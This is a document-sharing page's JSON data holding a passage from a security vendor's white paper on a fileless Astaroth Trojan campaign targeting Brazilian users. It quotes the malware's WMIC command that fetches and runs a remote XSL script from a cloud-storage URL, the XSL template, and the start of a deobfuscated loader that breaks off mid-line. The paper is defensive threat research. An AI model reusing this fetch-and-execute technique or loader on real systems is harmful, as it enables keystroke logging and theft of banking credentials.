[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"detail-sidebar-cat-0-en-105":3,"doc-seo-148798-105":59,"doc-detail-148798-en":130},{"code":4,"msg":5,"data":6},0,"success",[7,13,18,23,28,33,38,43,48,51,55],{"id":8,"doc_module":4,"doc_module_name":9,"category_name":10,"show_sort_weight":11,"slug":12},1,"Document","Story & Novel",90,"story-novel",{"id":14,"doc_module":4,"doc_module_name":9,"category_name":15,"show_sort_weight":16,"slug":17},2,"Literature",80,"literature",{"id":19,"doc_module":4,"doc_module_name":9,"category_name":20,"show_sort_weight":21,"slug":22},4,"Exam",70,"exam",{"id":24,"doc_module":4,"doc_module_name":9,"category_name":25,"show_sort_weight":26,"slug":27},5,"Comic",60,"comic",{"id":29,"doc_module":4,"doc_module_name":9,"category_name":30,"show_sort_weight":31,"slug":32},6,"Technology",50,"technology",{"id":34,"doc_module":4,"doc_module_name":9,"category_name":35,"show_sort_weight":36,"slug":37},7,"Healthcare",40,"healthcare",{"id":39,"doc_module":4,"doc_module_name":9,"category_name":40,"show_sort_weight":41,"slug":42},8,"Research & Report",30,"research-report",{"id":44,"doc_module":4,"doc_module_name":9,"category_name":45,"show_sort_weight":46,"slug":47},9,"Religion & Spirituality",20,"religion-spirituality",{"id":46,"doc_module":4,"doc_module_name":9,"category_name":49,"show_sort_weight":46,"slug":50},"World Cup","world-cup",{"id":52,"doc_module":4,"doc_module_name":9,"category_name":53,"show_sort_weight":52,"slug":54},10,"Lifestyle","lifestyle",{"id":56,"doc_module":4,"doc_module_name":9,"category_name":57,"show_sort_weight":24,"slug":58},19,"General","general",{"code":4,"msg":60,"data":61},"ok",{"site_id":62,"language":63,"slug":64,"title":65,"keywords":66,"description":67,"schema_data":68,"social_meta":123,"head_meta":125,"extra_data":127,"updated_unix":129},105,"en","astaroth-trojan-resurfaces-targets-brazil-through-fileless-campaign-key-findings-and-infection-kill-chain","Astaroth Trojan Resurfaces, Targets Brazil through Fileless Campaign - Key Findings and Infection Kill Chain","","Astaroth spyware resurfaces with a fileless infection approach, leveraging native Microsoft tools and living-off-the-land techniques to evade traditional security detection. The campaign delivers payloads via legitimate online services such as GitHub and Google Drive, while targeting Brazil through locale and Portuguese keyboard checks before execution. Keystroke logging activates only in Internet Explorer and only when victims browse to specific Brazilian banks or business sites, with Chrome or Firefox terminated to enforce IE usage. The report details the infection kill chain and observed use of multiple malware versions hosted across many websites.",{"@graph":69,"@context":122},[70,84,105],{"@type":71,"itemListElement":72},"BreadcrumbList",[73,77,79,82],{"item":74,"name":75,"@type":76,"position":8},"https://docshare.wps.com","Home","ListItem",{"item":78,"name":9,"@type":76,"position":14},"https://docshare.wps.com/document/",{"item":80,"name":40,"@type":76,"position":81},"https://docshare.wps.com/document/research-report/",3,{"item":83,"name":65,"@type":76,"position":19},"https://docshare.wps.com/document/astaroth-trojan-resurfaces-targets-brazil-through-fileless-campaign-key-findings-and-infection-kill-chain/148798/",{"url":83,"name":65,"@type":85,"image":86,"author":91,"headline":65,"publisher":94,"fileFormat":97,"inLanguage":63,"description":67,"dateModified":98,"datePublished":99,"encodingFormat":97,"isAccessibleForFree":100,"interactionStatistic":101},"DigitalDocument",{"url":87,"@type":88,"width":89,"height":90},"https://docshare.wps.com/thumbnails/astaroth-trojan-resurfaces-targets-brazil-through-fileless-campaign-key-findings-and-infection-kill-chain/148798.png","ImageObject",300,407,{"name":92,"@type":93},"Skyler","Person",{"url":74,"name":95,"@type":96},"DocShare","Organization","application/pdf","2026-09-17","2026-08-26",true,{"@type":102,"interactionType":103,"userInteractionCount":19},"InteractionCounter",{"@type":104},"ViewAction",{"@type":106,"mainEntity":107},"FAQPage",[108,114,118],{"name":109,"@type":110,"acceptedAnswer":111},"How does the Astaroth campaign initially deliver the malware payload?","Question",{"text":112,"@type":113},"Users are tricked into downloading an archive containing a malicious .LNK shortcut. The shortcut launches cmd.exe with an obfuscated command line to begin execution.","Answer",{"name":115,"@type":110,"acceptedAnswer":116},"What makes this Astaroth campaign hard to detect?",{"text":117,"@type":113},"It uses fileless techniques and native Microsoft tools (living off the land) to avoid traditional security solutions. It also relies on parsing XSL content to run embedded script logic.",{"name":119,"@type":110,"acceptedAnswer":120},"How does the campaign target Brazil and what browser behavior does it enforce?",{"text":121,"@type":113},"Execution is triggered only after checks confirm a Brazilian locale and a Portuguese keyboard. Keystroke logging occurs only when using Internet Explorer and browsing to specific Brazilian banks or businesses, and the malware terminates Chrome/Firefox to ensure IE is used.","https://schema.org",{"og:url":83,"og:type":124,"og:title":65,"og:site_name":95,"og:description":67},"article",{"robots":126,"canonical":83},"index,follow",{"doc_id":128,"site_id":62},148798,1787786211,{"code":4,"msg":5,"data":131},{"doc_id":128,"user_id":132,"nickname":92,"user_avatar":133,"doc_module":4,"category_id":39,"category_name":40,"doc_title":65,"doc_description":67,"doc_content":134,"file_id":135,"file_url":136,"file_type":137,"file_size":138,"view_count":19,"is_deleted":4,"is_public":8,"is_downloadable":8,"audit_status":8,"page_count":139,"language":140,"language_code":63,"site_id":62,"html_lang":63,"table_of_contents":141,"faqs":142,"seo_title":143,"seo_description":67,"update_tm":129,"read_time":144},2336464648746,"https://ap-avatar.wpscdn.com/davatar_276721f389ce27ea32af1340a28f341c","White Paper  \nAstaroth Trojan Resurfaces, Targets Brazil through Fileless Campaign  \nWhite Paper  \n Contents   \n Key Findings: 3   Infection Kill Chain 3   Post Infection Payloads 11   Campaign Evolution 13   Users Targeted 16   Conclusion 16   IOCs 16   \nAuthors:  \nVlad Dorin Cîncean – Bitdefender Junior Software Engineer  \nBitdefender ATD Team  \nWhite Paper  \nDuring routine detection monitoring from our Advanced Threat Defense technology, Bitdefender researchers found an interesting spike in malware activity that involved the use of Microsoft binaries in the infection process, as well as the use of GitHub and Google Drive for delivering payloads. After analyzing the detection details we were able to identify this activity as a resurgence of the Astaroth spyware, a Trojan and information stealer known since late 2017.  \nWhat sets this Astaroth campaign apart is the use of native Microsoft tools – commonly known as “living off the land” -to avoid detection by traditional security solutions, as well as the fact that it specifically targets Brazil by checking for a Brazilian locale anda Portuguese keyboard before activating. Bitdefender telemetry shows that 92.61 percent of the users targeted by this May 2019 Astaroth campaign originate in Brazil.  \nAstaroth logs keystrokes only when a victim uses Internet Explorer (IE) and browses to specific Brazilian banks or business, and will even terminate Chrome or Firefox executables to make sure the victim uses IE. Our investigation also revealed that threat actors seem to use multiple versions of the same malware and host them on multiple websites.  \nKey Findings:  \n● Astaroth distribution via legitimate online services (GitHub, Google Drive)  \n● Campaign specifically targets Brazilian users (92 .61 percent) by checking for a Brazilian locale and a Portuguese keyboard before activating  \n● Uses fileless techniques and native Microsoft tools to hide from traditional security solutions  \n● Threat actors use multiple version of the same malware, each hosted on a large number of websites  \n● Logs keystrokes only on Internet Explorer and browses to specific Brazilian banks or business  \nInfection Kill Chain  \nIn this section, we present the infection kill chain, as it has been analyzed by our Attack Research team.  \nThe user is tricked to download an archive from the internet. The archive contains a malicious . LNK file (shortcut) with a name designed to attract the user’s attention. The shortcut has as target cmd.exe, a well-known Windows binary that can be used to execute various commands.  \nWhen the user double clicks the . LNK file, causes a cmd.exe to start with an obfuscated command line.  \nWhite Paper  \nThen, cmd.exe starts a new WMIC.exe process with the following style of commandline:  \nC:\\Windows\\system32\\wbem\\WMIC .exe os get d57i26aE, numberofprocesses / format:”[https://storage.googleapis.com/awsdx/09/v.txt\\#](https://storage.googleapis.com/awsdx/09/v.txt#) [redacted]  \nThe /format parameter causes WMIC.exe to access and parse a XSL from google drive with the following content. Note that, the extension, as seen in the URL does not necessary have to be XSL. It may be anything, including TXT and no extension at all.  \n\u003C?xml version=’1 .0’?>\u003Cstylesheet  \nxmlns=”[http://www.w3.org/1999/XSL/Transform](http://www.w3.org/1999/XSL/Transform)” xmlns:ms=”urn:schemas-microsoftcom:xslt”  \nxmlns:user=”placeholder”version=”1 .0”>  \n\u003Coutput method=”text”/>  \n\u003Cms:script implements-prefix=”user” language=”JScript”>  \n\u003C![CDATA[  \n-> Obfuscated JavaScript code  \n]]> \u003C/ms:script>  \n\u003C/stylesheet>  \nRemoving the obfuscation, one can find a script similar to the one below. Please note the Portuguese sounding variable names like pingadori or preguita.  \n‘use strict’;  \n/** @type {!Array} */  \nvar _ 0x7f38 = [“random”, “round”, “07/”, “[https://storage.googleapis.com/remarkx/](https://storage.googleapis.com/remarkx/)”,“vv.txt”, “fromCharCode”, “, “, “Scripting.FileSystemObject”, “WScript.Shell”,“Shell.","cbCaiozPrF5q1Ptu","https://ap.wps.com/l/cbCaiozPrF5q1Ptu","pdf",9630626,26,"English","# Key Findings\n# Infection Kill Chain\n# Post Infection Payloads\n# Campaign Evolution\n# Users Targeted\n# Conclusion\n# IOCs","[{\"question\":\"How does the Astaroth campaign initially deliver the malware payload?\",\"answer\":\"Users are tricked into downloading an archive containing a malicious .LNK shortcut. The shortcut launches cmd.exe with an obfuscated command line to begin execution.\"},{\"question\":\"What makes this Astaroth campaign hard to detect?\",\"answer\":\"It uses fileless techniques and native Microsoft tools (living off the land) to avoid traditional security solutions. It also relies on parsing XSL content to run embedded script logic.\"},{\"question\":\"How does the campaign target Brazil and what browser behavior does it enforce?\",\"answer\":\"Execution is triggered only after checks confirm a Brazilian locale and a Portuguese keyboard. Keystroke logging occurs only when using Internet Explorer and browsing to specific Brazilian banks or businesses, and the malware terminates Chrome/Firefox to ensure IE is used.\"}]","Astaroth Trojan Resurfaces, Targets Brazil through Fileless Campaign - Key Findings and Infection Kill Chain | PDF",66]